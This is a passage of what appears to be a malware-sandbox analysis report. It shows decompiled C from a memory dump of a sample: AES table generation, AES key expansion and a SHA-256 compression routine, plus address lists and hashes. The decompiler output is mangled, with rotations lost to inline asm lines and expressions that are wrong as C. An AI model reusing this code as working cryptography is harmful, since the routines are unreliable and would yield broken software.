				goto L9;
			}

0x0102473f
0x01024742
0x01024746
0x01024749
0x0102474d
0x01024750
0x010247be
0x010247c1
0x01024810
0x01024810
0x01024813
0x01024780
0x01024782
0x01024787
0x01024789
0x0102482e
0x01024832
0x0102483b
0x01024840
0x01024841
0x01024845
0x01024847
0x0102484c
0x0102484f
0x01024851
0x0102487a
0x0102487a
0x0102487d
0x01024880
0x01024887
0x01024889
0x0102488c
0x0102488e
0x01024892
0x01024892
0x01024895
0x010248a0
0x010248a0
0x010248a2
0x010248a2
0x010248a4
0x010248aa
0x010248aa
0x010248af
0x010248b2
0x010248bd
0x010248bd
0x010248bf
0x010248bf
0x010248ca
0x010248ce
0x010248ce
0x010248d1
0x010248d7
0x010248d9
0x010248dc
0x010248ec
0x010248f1
0x010248f1
0x01024906
0x0102490b
0x0102490e
0x01024913
0x01024916
0x01024918
0x0102491a
0x0102491d
0x01024920
0x0102492d
0x01024932
0x01024932
0x01024920
0x01024939
0x0102493e
0x01024941
0x01024946
0x01024949
0x0102494b
0x01024958
0x0102495d
0x0102494b
0x01024960
0x01024963
0x01024968
0x01024968
0x010248b4
0x010248b7
0x00000000
0x00000000
0x010248b9
0x00000000
0x010248b9
0x010248a6
0x010248a8
0x00000000
0x00000000
0x00000000
0x010248a8
0x01024897
0x0102489a
0x00000000
0x00000000
0x0102489c
0x00000000
0x0102489c
0x01024890
0x01024890
0x01024890
0x00000000
0x01024890
0x01024882
0x01024885
0x00000000
0x00000000
0x00000000
0x01024885
0x01024855
0x01024858
0x0102485a
0x01024862
0x01024864
0x0102486e
0x01024870
0x01024872
0x00000000
0x00000000
0x01024874
0x01024878
0x01024878
0x00000000
0x01024878
0x01024866
0x00000000
0x01024866
0x0102485c
0x00000000
0x0102485c
0x01024834
0x00000000
0x01024834
0x0102478f
0x0102478f
0x00000000
0x0102478f
0x0102481a
0x0102481a
0x0102481d
0x010247ef
0x010247ef
0x010247f0
0x010247f2
0x010247f4
0x00000000
0x010247f4
0x0102481f
0x01024822
0x00000000
0x00000000
0x01024828
0x01024797
0x01024797
0x00000000
0x01024797
0x010247c3
0x01024806
0x00000000
0x01024806
0x010247c5
0x010247c8
0x010247fb
0x010247fd
0x00000000
0x010247fd
0x010247ca
0x010247cd
0x010247eb
0x010247eb
0x010247eb
0x010247eb
0x00000000
0x010247eb
0x010247cf
0x010247d2
0x010247e4
0x00000000
0x010247e4
0x010247d4
0x010247d7
0x00000000
0x00000000
0x010247db
0x00000000
0x010247db
0x01024752
0x00000000
0x00000000
0x01024758
0x0102475b
0x0102479b
0x0102479b
0x0102479e
0x010247b7
0x00000000
0x010247b7
0x010247a0
0x010247a0
0x010247a3
0x00000000
0x00000000
0x010247a6
0x010247a9
0x00000000
0x00000000
0x010247ab
0x010247ae
0x00000000
0x010247ae
0x0102475d
0x01024796
0x00000000
0x01024796
0x01024762
0x00000000
0x00000000
0x0102476b
0x00000000
0x00000000
0x01024770
0x00000000
0x00000000
0x01024775
0x00000000
0x00000000
0x0102477e
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction ID: 7eb7e6923522a14227a3a6b2d15ee84195b3efd65f34f9969475821b7e84971c
Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction Fuzzy Hash: 8B51AC70710AB557EBB8892C8898BFF6FCDBB53204F0805CADAD3DB682C294D545C396

Uniqueness

Uniqueness Score: -1.00%

Function 0100DE6C, Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0100DE6C() {
				intOrPtr _v8;
				char _v521;
				char _t140;
				signed int _t154;
				signed int _t155;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t179;
				signed int _t181;
				signed char _t192;
				signed int _t199;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed char _t211;
				signed int _t219;
				void* _t220;

				_t140 = 0;
				_t179 = 1;
				_t207 = 1;
				do {
					 *(_t220 + _t140 - 0x304) = _t207;
					 *(_t220 + _t140 - 0x205) = _t207;
					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
					_v8 = _t140 + 1;
					asm("sbb ecx, ecx");
					_t140 = _v8;
					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
				} while (_t207 != 1);
				_t208 = 0;
				do {
					 *(_t208 + 0x10451a0) = _t179;
					asm("sbb ecx, ecx");
					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
					_t208 = _t208 + 1;
				} while (_t208 < 0x1e);
				_t181 = 0;
				do {
					if(_t181 == 0) {
						_t209 = 0;
					} else {
						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
					}
					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
					 *(_t181 + 0x1044fa0) = _t192;
					 *(0x1045dc1 + _t181 * 4) = _t192;
					 *(0x1045dc0 + _t181 * 4) = _t192;
					 *(0x10459c3 + _t181 * 4) = _t192;
					 *(0x10459c0 + _t181 * 4) = _t192;
					 *(0x10455c3 + _t181 * 4) = _t192;
					 *(0x10455c2 + _t181 * 4) = _t192;
					 *(0x10451c2 + _t181 * 4) = _t192;
					 *(0x10451c1 + _t181 * 4) = _t192;
					if(_t192 == 0) {
						_t154 = 0;
					} else {
						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
					}
					 *(0x1045dc3 + _t181 * 4) = _t154;
					 *(0x10459c2 + _t181 * 4) = _t154;
					 *(0x10455c1 + _t181 * 4) = _t154;
					 *(0x10451c0 + _t181 * 4) = _t154;
					if(_t192 == 0) {
						_t155 = 0;
					} else {
						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
					}
					_t219 = _t181 & 0x000000ff;
					 *(0x1045dc2 + _t181 * 4) = _t155;
					 *(0x10459c1 + _t181 * 4) = _t155;
					 *(0x10455c0 + _t181 * 4) = _t155;
					 *(0x10451c3 + _t181 * 4) = _t155;
					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
						_t211 = 0;
					} else {
						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
					}
					 *(_t181 + 0x10450a0) = _t211;
					if(_t211 == 0) {
						_t159 = 0;
					} else {
						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
					}
					_t199 = _t211 & 0x000000ff;
					 *(0x1046dc2 + _t181 * 4) = _t159;
					 *(0x10469c1 + _t181 * 4) = _t159;
					 *(0x10465c0 + _t181 * 4) = _t159;
					 *(0x10461c3 + _t181 * 4) = _t159;
					 *(0x1047dc2 + _t199 * 4) = _t159;
					 *(0x10479c1 + _t199 * 4) = _t159;
					 *(0x10475c0 + _t199 * 4) = _t159;
					 *(0x10471c3 + _t199 * 4) = _t159;
					if(_t211 == 0) {
						_t160 = 0;
					} else {
						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
					}
					 *(0x1046dc0 + _t181 * 4) = _t160;
					 *(0x10469c3 + _t181 * 4) = _t160;
					 *(0x10465c2 + _t181 * 4) = _t160;
					 *(0x10461c1 + _t181 * 4) = _t160;
					 *(0x1047dc0 + _t199 * 4) = _t160;
					 *(0x10479c3 + _t199 * 4) = _t160;
					 *(0x10475c2 + _t199 * 4) = _t160;
					 *(0x10471c1 + _t199 * 4) = _t160;
					if(_t211 == 0) {
						_t161 = 0;
					} else {
						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
					}
					 *(0x1046dc1 + _t181 * 4) = _t161;
					 *(0x10469c0 + _t181 * 4) = _t161;
					 *(0x10465c3 + _t181 * 4) = _t161;
					 *(0x10461c2 + _t181 * 4) = _t161;
					 *(0x1047dc1 + _t199 * 4) = _t161;
					 *(0x10479c0 + _t199 * 4) = _t161;
					 *(0x10475c3 + _t199 * 4) = _t161;
					 *(0x10471c2 + _t199 * 4) = _t161;
					if(_t211 == 0) {
						_t162 = 0;
					} else {
						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
					}
					 *(0x1046dc3 + _t181 * 4) = _t162;
					 *(0x10469c2 + _t181 * 4) = _t162;
					 *(0x10465c1 + _t181 * 4) = _t162;
					 *(0x10461c0 + _t181 * 4) = _t162;
					_t181 = _t181 + 1;
					 *(0x1047dc3 + _t199 * 4) = _t162;
					 *(0x10479c2 + _t199 * 4) = _t162;
					 *(0x10475c1 + _t199 * 4) = _t162;
					 *(0x10471c0 + _t199 * 4) = _t162;
				} while (_t181 < 0x100);
				return _t162;
			}

0x0100de75
0x0100de7a
0x0100de7c
0x0100de83
0x0100de83
0x0100de8a
0x0100de91
0x0100de99
0x0100dea8
0x0100deae
0x0100deb1
0x0100deb3
0x0100deb7
0x0100deb9
0x0100debb
0x0100dec8
0x0100dece
0x0100ded0
0x0100ded1
0x0100ded6
0x0100ded8
0x0100deda
0x0100def4
0x0100dedc
0x0100deef
0x0100deef
0x0100df12
0x0100df14
0x0100df1a
0x0100df21
0x0100df28
0x0100df2f
0x0100df36
0x0100df3d
0x0100df44
0x0100df4b
0x0100df54
0x0100df6b
0x0100df56
0x0100df61
0x0100df61
0x0100df6d
0x0100df74
0x0100df7b
0x0100df82
0x0100df8b
0x0100dfa2
0x0100df8d
0x0100df98
0x0100df98
0x0100dfa4
0x0100dfa9
0x0100dfb5
0x0100dfc1
0x0100dfca
0x0100dfda
0x0100e00e
0x0100dfdc
0x0100e00a
0x0100e00a
0x0100e010
0x0100e018
0x0100e02f
0x0100e01a
0x0100e025
0x0100e025
0x0100e031
0x0100e034
0x0100e03b
0x0100e042
0x0100e049
0x0100e050
0x0100e057
0x0100e05e
0x0100e065
0x0100e06e
0x0100e082
0x0100e070
0x0100e078
0x0100e078
0x0100e084
0x0100e08b
0x0100e092
0x0100e099
0x0100e0a0
0x0100e0a7
0x0100e0ae
0x0100e0b5
0x0100e0be
0x0100e0d2
0x0100e0c0
0x0100e0c8
0x0100e0c8
0x0100e0d4
0x0100e0db
0x0100e0e2
0x0100e0e9
0x0100e0f0
0x0100e0f7
0x0100e0fe
0x0100e105
0x0100e10e
0x0100e122
0x0100e110
0x0100e118
0x0100e118
0x0100e124
0x0100e12b
0x0100e132
0x0100e139
0x0100e140
0x0100e141
0x0100e148
0x0100e14f
0x0100e156
0x0100e15d
0x0100e16e

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b402a7d91953dd09d760f6dcc1930ed2cdd0de78c7d7696419ae0572e6bd437
Instruction ID: a9c8d364d72f72cc070e38ec9d92a2bebe688eb6be74489b53db6041a56594fd
Opcode Fuzzy Hash: 5b402a7d91953dd09d760f6dcc1930ed2cdd0de78c7d7696419ae0572e6bd437
Instruction Fuzzy Hash: 3A81AFEA2192D49FD7279EBC3AE42F93FA15733200F1804FA85C5C629BD13B4998D761

Uniqueness

Uniqueness Score: -1.00%

Function 0100E8A0, Relevance: .2, Instructions: 154
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0100E8A0(signed char __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				signed char _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				signed char _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E0101F4B0( &_v32, _a4, 0x20);
				_t141 =  &(( &_v40)[0xc]);
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0x10451a0;
						do {
							_v32 = _v32 ^  *((_t141[0x15 + _t135 * 4] & 0x000000ff) + 0x1044fa0);
							_v31 = _v31 ^  *((_t141[0x16 + _t135 * 4] & 0x000000ff) + 0x1044fa0);
							_v30 = _v30 ^  *((_t141[0x17 + _t135 * 4] & 0x000000ff) + 0x1044fa0);
							_v29 = _v29 ^  *((_t141[0x14 + _t135 * 4] & 0x000000ff) + 0x1044fa0);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_v40 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_v40;
									 *_t58 = _v40 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_v40 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0x1044fa0);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0x1044fa0);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0x1044fa0);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0x1044fa0);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_v40;
									 *_t79 = _v40 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_v40 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_v40;
										 *_t53 = _v40 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_v40 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _v40 + 4;
											_t133 = _t133 + 1;
											_v40 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}

0x0100e8a6
0x0100e8b6
0x0100e8b9
0x0100e8be
0x0100e8c2
0x0100e8c7
0x0100e8ca
0x0100e8cc
0x0100e8ce
0x0100e8d2
0x0100e919
0x0100e91c
0x0100e922
0x0100e927
0x0100e936
0x0100e945
0x0100e954
0x0100e963
0x0100e967
0x0100e969
0x0100e96e
0x0100e975
0x0100e9a6
0x0100e9aa
0x0100e9b2
0x0100e9b4
0x0100e9b5
0x0100e9b8
0x0100e9ba
0x0100e9bb
0x0100e9bb
0x0100e9c0
0x0100e9c0
0x0100e9c0
0x0100e9cc
0x0100e9d0
0x0100e9de
0x0100e9ed
0x0100e9fc
0x0100ea0b
0x0100ea0f
0x0100ea11
0x0100ea12
0x0100ea12
0x0100ea15
0x0100ea17
0x0100ea18
0x0100ea18
0x0100ea1d
0x0100ea1d
0x0100ea1d
0x0100e977
0x0100e97a
0x0100e983
0x0100e987
0x0100e98b
0x0100e98b
0x0100e98d
0x0100e98d
0x0100e991
0x0100e994
0x0100e995
0x0100e99a
0x0100e99d
0x0100e99d
0x0100e99d
0x0100e9a4
0x0100e97a
0x0100ea24
0x0100ea28
0x0100ea69
0x0100ea69
0x00000000
0x0100ea2a
0x0100ea31
0x0100ea5d
0x0100ea5d
0x0100ea33
0x0100ea37
0x0100ea3a
0x0100ea3e
0x0100ea48
0x0100ea4c
0x0100ea51
0x0100ea54
0x0100ea55
0x0100ea5b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0100ea5b
0x0100ea3e
0x0100ea60
0x0100ea60
0x0100ea62
0x0100ea63
0x0100ea63
0x0100ea67
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0100ea67
0x0100ea2a
0x0100ea6c
0x0100ea6c
0x0100ea6c
0x0100e927
0x00000000
0x0100e8d4
0x0100e8df
0x0100e8e5
0x0100e8e9
0x0100e8f2
0x0100e8f5
0x0100e8f8
0x0100e8f9
0x0100e8fc
0x0100e8fd
0x0100e901
0x0100e907
0x00000000
0x00000000
0x00000000
0x0100e907
0x0100e909
0x0100e909
0x0100e910
0x0100e912
0x0100e913
0x0100e913
0x0100e917
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0100e917
0x0100e8d4
0x0100ea7d
0x0100ea7d

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b327e9ecfc2bf75bdd1bc32ae2a9cf744d1e695ca5b6f5085fb3352a5d9016dd
Instruction ID: 31c375929650b6a5a4ee8e524b43dfbd42392458003e898ebaa429c0a7566ea2
Opcode Fuzzy Hash: b327e9ecfc2bf75bdd1bc32ae2a9cf744d1e695ca5b6f5085fb3352a5d9016dd
Instruction Fuzzy Hash: 8451B1715083D64FD713CF28D1845AEBFE1BFCA214F494CAEE4D56B253D220A689CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0100F968, Relevance: .1, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E0100F968() {
				signed int _t85;
				signed int* _t86;
				unsigned int* _t87;
				void* _t88;
				unsigned int _t90;
				unsigned int _t113;
				signed int _t115;
				signed int* _t120;
				signed int _t121;
				signed int* _t122;
				signed int _t123;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t140;

				_t120 =  *(_t140 + 0x130);
				_t123 = 0;
				_t86 =  &(_t120[0xa]);
				do {
					 *((intOrPtr*)(_t140 + 0x30 + _t123 * 4)) = E01026064( *_t86);
					_t86 =  &(_t86[1]);
					_t123 = _t123 + 1;
				} while (_t123 < 0x10);
				_t87 = _t140 + 0x68;
				_t137 = 0x30;
				do {
					_t90 =  *(_t87 - 0x34);
					_t113 =  *_t87;
					asm("rol esi, 0xe");
					_t87 =  &(_t87[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t87[1] = (_t90 ^ _t90 ^ _t90 >> 0x00000003) + (_t113 ^ _t113 ^ _t113 >> 0x0000000a) +  *((intOrPtr*)(_t87 - 0x3c)) +  *((intOrPtr*)(_t87 - 0x18));
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_t88 = 0;
				_t138 = _t120[4];
				_t115 = _t120[5];
				 *(_t140 + 0x10) = _t120[1];
				 *(_t140 + 0x20) = _t120[3];
				 *(_t140 + 0x1c) =  *_t120;
				 *(_t140 + 0x18) = _t120[6];
				_t121 =  *(_t140 + 0x1c);
				 *(_t140 + 0x14) = _t120[2];
				 *(_t140 + 0x24) = _t120[7];
				while(1) {
					 *(_t140 + 0x28) = _t138;
					asm("ror esi, 0xb");
					asm("rol eax, 0x7");
					asm("ror eax, 0x6");
					 *(_t140 + 0x18) = _t115;
					_t33 = _t88 + 0x1033a50; // 0x0
					_t135 = (_t138 ^ _t138 ^ _t138) + ( !_t138 &  *(_t140 + 0x18) ^ _t115 & _t138) +  *_t33 +  *((intOrPtr*)(_t140 + _t88 + 0x2c));
					_t88 = _t88 + 4;
					_t136 = _t135 +  *(_t140 + 0x24);
					 *(_t140 + 0x24) =  *(_t140 + 0x18);
					_t138 =  *(_t140 + 0x20) + _t136;
					asm("ror edx, 0xd");
					asm("rol eax, 0xa");
					asm("ror eax, 0x2");
					_t85 =  *(_t140 + 0x10);
					 *(_t140 + 0x10) = _t121;
					 *(_t140 + 0x20) =  *(_t140 + 0x14);
					 *(_t140 + 0x14) = _t85;
					_t121 = (_t121 ^ _t121 ^ _t121) + (( *(_t140 + 0x14) ^  *(_t140 + 0x10)) & _t121 ^  *(_t140 + 0x14) &  *(_t140 + 0x10)) + _t136;
					if(_t88 >= 0x100) {
						break;
					}
					_t115 =  *(_t140 + 0x28);
				}
				 *(_t140 + 0x1c) = _t121;
				_t122 =  *(_t140 + 0x130);
				 *_t122 =  *_t122 +  *(_t140 + 0x1c);
				_t122[1] = _t122[1] +  *(_t140 + 0x10);
				_t122[2] = _t122[2] + _t85;
				_t122[3] = _t122[3] +  *(_t140 + 0x20);
				_t122[5] = _t122[5] +  *(_t140 + 0x28);
				_t122[6] = _t122[6] +  *(_t140 + 0x18);
				_t122[4] = _t122[4] + _t138;
				_t122[7] = _t122[7] +  *(_t140 + 0x24);
				return _t85;
			}

0x0100f972
0x0100f979
0x0100f97b
0x0100f97e
0x0100f985
0x0100f989
0x0100f98c
0x0100f98e
0x0100f995
0x0100f999
0x0100f99a
0x0100f99a
0x0100f99f
0x0100f9a3
0x0100f9a6
0x0100f9a9
0x0100f9b7
0x0100f9ba
0x0100f9cc
0x0100f9cf
0x0100f9cf
0x0100f9d7
0x0100f9db
0x0100f9de
0x0100f9e1
0x0100f9e8
0x0100f9ef
0x0100f9f6
0x0100f9fd
0x0100fa01
0x0100fa05
0x0100fa0f
0x0100fa11
0x0100fa15
0x0100fa1a
0x0100fa29
0x0100fa3e
0x0100fa42
0x0100fa4a
0x0100fa4e
0x0100fa51
0x0100fa55
0x0100fa59
0x0100fa5b
0x0100fa60
0x0100fa67
0x0100fa7e
0x0100fa84
0x0100fa8c
0x0100fa90
0x0100fa94
0x0100fa9d
0x00000000
0x00000000
0x0100fa0b
0x0100fa0b
0x0100faa3
0x0100faa7
0x0100fab2
0x0100fab8
0x0100fabd
0x0100fac4
0x0100facb
0x0100fad2
0x0100fad5
0x0100fadc
0x0100fae9

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb8f00d48a6728b006d1b1b8b5422ea2a233db27e4bd2ff6a1fc260a0872082
Instruction ID: 9a43eb1ad079090b6aa4ac166e4eedd26d1a70544e141459dcbf43af5228eb04
Opcode Fuzzy Hash: 1eb8f00d48a6728b006d1b1b8b5422ea2a233db27e4bd2ff6a1fc260a0872082
Instruction Fuzzy Hash: 515124B1A083128BC748CF19D48059AF7E1FF88354F058A2EE899A7740DB34E959CB96

Uniqueness

Uniqueness Score: -1.00%

Function 010137C1, Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E010137C1(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E010147FB(__ecx) != 0) {
					E0100A7E4(_t88,  ~( *(_t88 + 4)) & 0x00000007);
